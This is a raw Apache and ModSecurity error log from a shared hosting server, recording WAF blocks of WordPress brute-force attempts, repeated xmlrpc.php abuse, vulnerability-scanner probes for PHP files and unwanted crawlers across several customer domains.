[Tue May 26 19:28:58.683804 2026] [security2:error] [pid 49598:tid 49707] [remote 194.163.139.224:46268] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 224.139.163.194.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWnIuzJzkdc0WtdrwtiBAAAq2w"]
[Tue May 26 19:28:59.194674 2026] [security2:error] [pid 49598:tid 49797] [client 20.63.34.22:12111] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/ff1.php"] [unique_id "ahWnI-zJzkdc0WtdrwtiHAAAAMo"]
[Tue May 26 19:28:59.194792 2026] [security2:error] [pid 49598:tid 49797] [client 20.63.34.22:12111] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/ff1.php"] [unique_id "ahWnI-zJzkdc0WtdrwtiHAAAAMo"]
[Tue May 26 19:28:59.402841 2026] [security2:error] [pid 49598:tid 49850] [client 91.245.236.124:39593] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnI-zJzkdc0WtdrwtiHQAAAP8"]
[Tue May 26 19:28:59.403010 2026] [security2:error] [pid 49598:tid 49850] [client 91.245.236.124:39593] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnI-zJzkdc0WtdrwtiHQAAAP8"]
[Tue May 26 19:28:59.985361 2026] [security2:error] [pid 49598:tid 49750] [client 20.63.34.22:12269] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/explorer/index_.php"] [unique_id "ahWnI-zJzkdc0WtdrwtiKwAAAJs"]
[Tue May 26 19:28:59.985476 2026] [security2:error] [pid 49598:tid 49750] [client 20.63.34.22:12269] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/explorer/index_.php"] [unique_id "ahWnI-zJzkdc0WtdrwtiKwAAAJs"]
[Tue May 26 19:29:00.167589 2026] [security2:error] [pid 49598:tid 49847] [client 91.245.236.124:10733] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnJOzJzkdc0WtdrwtiMgAAAPw"]
[Tue May 26 19:29:00.167702 2026] [security2:error] [pid 49598:tid 49847] [client 91.245.236.124:10733] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnJOzJzkdc0WtdrwtiMgAAAPw"]
[Tue May 26 19:29:00.283108 2026] [security2:error] [pid 49598:tid 49798] [client 20.63.34.22:12181] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/error.php"] [unique_id "ahWnJOzJzkdc0WtdrwtiMwAAAMs"]
[Tue May 26 19:29:00.283263 2026] [security2:error] [pid 49598:tid 49798] [client 20.63.34.22:12181] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/error.php"] [unique_id "ahWnJOzJzkdc0WtdrwtiMwAAAMs"]
[Tue May 26 19:29:00.702154 2026] [security2:error] [pid 49598:tid 49785] [client 20.63.34.22:12255] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/333.php"] [unique_id "ahWnJOzJzkdc0WtdrwtiQgAAAL4"]
[Tue May 26 19:29:00.702331 2026] [security2:error] [pid 49598:tid 49785] [client 20.63.34.22:12255] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/333.php"] [unique_id "ahWnJOzJzkdc0WtdrwtiQgAAAL4"]
[Tue May 26 19:29:00.783141 2026] [security2:error] [pid 49598:tid 49795] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnJOzJzkdc0WtdrwtiOQAAAMg"]
[Tue May 26 19:29:00.947063 2026] [security2:error] [pid 49598:tid 49784] [client 91.245.236.124:44359] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnJOzJzkdc0WtdrwtiSQAAAL0"]
[Tue May 26 19:29:00.947154 2026] [security2:error] [pid 49598:tid 49784] [client 91.245.236.124:44359] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnJOzJzkdc0WtdrwtiSQAAAL0"]
[Tue May 26 19:29:01.077227 2026] [security2:error] [pid 49598:tid 49773] [client 20.63.34.22:12198] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/ftde.php"] [unique_id "ahWnJezJzkdc0WtdrwtiUwAAALI"]
[Tue May 26 19:29:01.077331 2026] [security2:error] [pid 49598:tid 49773] [client 20.63.34.22:12198] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/ftde.php"] [unique_id "ahWnJezJzkdc0WtdrwtiUwAAALI"]
[Tue May 26 19:29:01.279818 2026] [security2:error] [pid 49598:tid 49741] [client 51.68.247.209:53508] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "thriveswift.com"] [uri "/robots.txt"] [unique_id "ahWnJezJzkdc0WtdrwtiWwAAAJI"]
[Tue May 26 19:29:01.279978 2026] [security2:error] [pid 49598:tid 49741] [client 51.68.247.209:53508] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "thriveswift.com"] [uri "/robots.txt"] [unique_id "ahWnJezJzkdc0WtdrwtiWwAAAJI"]
[Tue May 26 19:29:01.707779 2026] [security2:error] [pid 49598:tid 49791] [client 91.245.236.124:60093] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnJezJzkdc0WtdrwtiZAAAAMQ"]
[Tue May 26 19:29:01.707884 2026] [security2:error] [pid 49598:tid 49791] [client 91.245.236.124:60093] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnJezJzkdc0WtdrwtiZAAAAMQ"]
[Tue May 26 19:29:01.742795 2026] [security2:error] [pid 49598:tid 49805] [client 20.63.34.22:12105] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/app.php"] [unique_id "ahWnJezJzkdc0WtdrwtiaAAAANI"]
[Tue May 26 19:29:01.742898 2026] [security2:error] [pid 49598:tid 49805] [client 20.63.34.22:12105] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/app.php"] [unique_id "ahWnJezJzkdc0WtdrwtiaAAAANI"]
[Tue May 26 19:29:02.199142 2026] [security2:error] [pid 49598:tid 49611] [remote 217.112.89.35:55924] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 35.89.112.217.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWnJuzJzkdc0WtdrwtibwAAjQw"]
[Tue May 26 19:29:02.471768 2026] [security2:error] [pid 49598:tid 49823] [client 91.245.236.124:30405] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnJuzJzkdc0WtdrwtidgAAAOQ"]
[Tue May 26 19:29:02.471883 2026] [security2:error] [pid 49598:tid 49823] [client 91.245.236.124:30405] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnJuzJzkdc0WtdrwtidgAAAOQ"]
[Tue May 26 19:29:03.233973 2026] [security2:error] [pid 49598:tid 49789] [client 91.245.236.124:27593] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnJ-zJzkdc0WtdrwtiiwAAAMI"]
[Tue May 26 19:29:03.234124 2026] [security2:error] [pid 49598:tid 49789] [client 91.245.236.124:27593] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnJ-zJzkdc0WtdrwtiiwAAAMI"]
[Tue May 26 19:29:03.317830 2026] [security2:error] [pid 49598:tid 49794] [client 54.39.0.148:18996] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "thriveswift.com"] [uri "/"] [unique_id "ahWnJ-zJzkdc0WtdrwtijwAAAMc"]
[Tue May 26 19:29:03.317963 2026] [security2:error] [pid 49598:tid 49794] [client 54.39.0.148:18996] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "thriveswift.com"] [uri "/"] [unique_id "ahWnJ-zJzkdc0WtdrwtijwAAAMc"]
[Tue May 26 19:29:04.020024 2026] [security2:error] [pid 49598:tid 49814] [client 91.245.236.124:35827] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnKOzJzkdc0WtdrwtipwAAANs"]
[Tue May 26 19:29:04.020166 2026] [security2:error] [pid 49598:tid 49814] [client 91.245.236.124:35827] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnKOzJzkdc0WtdrwtipwAAANs"]
[Tue May 26 19:29:04.369921 2026] [security2:error] [pid 49598:tid 49736] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnJ-zJzkdc0WtdrwtipAAAAI0"]
[Tue May 26 19:29:04.803386 2026] [security2:error] [pid 49598:tid 49738] [client 91.245.236.124:28045] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnKOzJzkdc0WtdrwtitAAAAI8"]
[Tue May 26 19:29:04.803495 2026] [security2:error] [pid 49598:tid 49738] [client 91.245.236.124:28045] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnKOzJzkdc0WtdrwtitAAAAI8"]
[Tue May 26 19:29:05.059422 2026] [security2:error] [pid 49598:tid 49770] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnKOzJzkdc0WtdrwtirQAAAK8"]
[Tue May 26 19:29:05.489125 2026] [security2:error] [pid 49598:tid 49674] [remote 222.165.190.235:40164] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.190.165.222.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWnKezJzkdc0WtdrwtiyAAAjEs"]
[Tue May 26 19:29:05.581126 2026] [security2:error] [pid 49598:tid 49786] [client 91.245.236.124:10583] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnKezJzkdc0WtdrwtiyQAAAL8"]
[Tue May 26 19:29:05.581256 2026] [security2:error] [pid 49598:tid 49786] [client 91.245.236.124:10583] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnKezJzkdc0WtdrwtiyQAAAL8"]
[Tue May 26 19:29:05.647999 2026] [security2:error] [pid 49598:tid 49778] [client 114.119.143.151:23311] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "preetishah.com"] [uri "/author/techdc/page/8/"] [unique_id "ahWnKezJzkdc0WtdrwtiywAAALc"], referer: https://preetishah.com/author/techdc/page/7/
[Tue May 26 19:29:05.918840 2026] [security2:error] [pid 49598:tid 49619] [remote 94.76.235.103:44128] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.235.76.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWnKezJzkdc0WtdrwtizwAAixQ"]
[Tue May 26 19:29:06.216081 2026] [security2:error] [pid 49598:tid 49656] [remote 222.165.190.235:40164] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.190.165.222.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWnKuzJzkdc0Wtdrwti1gAA2jk"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:29:06.360918 2026] [security2:error] [pid 49598:tid 49768] [client 91.245.236.124:61881] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnKuzJzkdc0Wtdrwti3gAAAK0"]
[Tue May 26 19:29:06.361069 2026] [security2:error] [pid 49598:tid 49768] [client 91.245.236.124:61881] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnKuzJzkdc0Wtdrwti3gAAAK0"]
[Tue May 26 19:29:06.786916 2026] [security2:error] [pid 49598:tid 49739] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnKuzJzkdc0Wtdrwti4wAAAJA"]
[Tue May 26 19:29:07.138326 2026] [security2:error] [pid 49598:tid 49821] [client 91.245.236.124:30099] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnK-zJzkdc0Wtdrwti9QAAAOI"]
[Tue May 26 19:29:07.138535 2026] [security2:error] [pid 49598:tid 49821] [client 91.245.236.124:30099] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnK-zJzkdc0Wtdrwti9QAAAOI"]
[Tue May 26 19:29:07.597535 2026] [security2:error] [pid 49598:tid 49640] [remote 216.73.216.30:1250] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWnK-zJzkdc0WtdrwtjAQAAoCk"]
[Tue May 26 19:29:07.807706 2026] [security2:error] [pid 49598:tid 49772] [client 114.119.138.130:44859] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujtradingco.com"] [uri "/pages/services-modern/"] [unique_id "ahWnK-zJzkdc0WtdrwtjBAAAALE"], referer: https://www.evaluateitbysqm.com/blogs/item/27-preparing-for-a-big-move.html?tmpl=component&print=1&start=3620
[Tue May 26 19:29:07.914464 2026] [security2:error] [pid 49598:tid 49805] [client 91.245.236.124:9725] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnK-zJzkdc0WtdrwtjBwAAANI"]
[Tue May 26 19:29:07.914573 2026] [security2:error] [pid 49598:tid 49805] [client 91.245.236.124:9725] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnK-zJzkdc0WtdrwtjBwAAANI"]
[Tue May 26 19:29:08.108995 2026] [security2:error] [pid 49598:tid 49632] [remote 91.206.200.156:56776] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 156.200.206.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wp-login.php"] [unique_id "ahWnK-zJzkdc0WtdrwtjDQAApSE"]
[Tue May 26 19:29:08.677416 2026] [security2:error] [pid 49598:tid 49756] [client 91.245.236.124:23635] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnLOzJzkdc0WtdrwtjHQAAAKE"]
[Tue May 26 19:29:08.677533 2026] [security2:error] [pid 49598:tid 49756] [client 91.245.236.124:23635] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnLOzJzkdc0WtdrwtjHQAAAKE"]
[Tue May 26 19:29:09.446616 2026] [security2:error] [pid 49598:tid 49753] [client 91.245.236.124:64813] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnLezJzkdc0WtdrwtjLQAAAJ4"]
[Tue May 26 19:29:09.446742 2026] [security2:error] [pid 49598:tid 49753] [client 91.245.236.124:64813] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnLezJzkdc0WtdrwtjLQAAAJ4"]
[Tue May 26 19:29:09.558939 2026] [security2:error] [pid 49598:tid 49829] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnLezJzkdc0WtdrwtjKwAAAOo"]
[Tue May 26 19:29:10.126149 2026] [security2:error] [pid 49598:tid 49839] [client 167.160.68.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWnLuzJzkdc0WtdrwtjQwAAAPQ"], referer: https://www.anujtradingco.com/
[Tue May 26 19:29:10.229867 2026] [security2:error] [pid 49598:tid 49772] [client 91.245.236.124:14827] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnLuzJzkdc0WtdrwtjRQAAALE"]
[Tue May 26 19:29:10.230015 2026] [security2:error] [pid 49598:tid 49772] [client 91.245.236.124:14827] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnLuzJzkdc0WtdrwtjRQAAALE"]
[Tue May 26 19:29:10.264925 2026] [core:error] [pid 49598:tid 49782] [client 205.210.31.2:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 19:29:10.264949 2026] [core:error] [pid 49598:tid 49782] [client 205.210.31.2:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 19:29:11.012979 2026] [security2:error] [pid 49598:tid 49847] [client 91.245.236.124:61099] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnL-zJzkdc0WtdrwtjZQAAAPw"]
[Tue May 26 19:29:11.013106 2026] [security2:error] [pid 49598:tid 49847] [client 91.245.236.124:61099] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnL-zJzkdc0WtdrwtjZQAAAPw"]
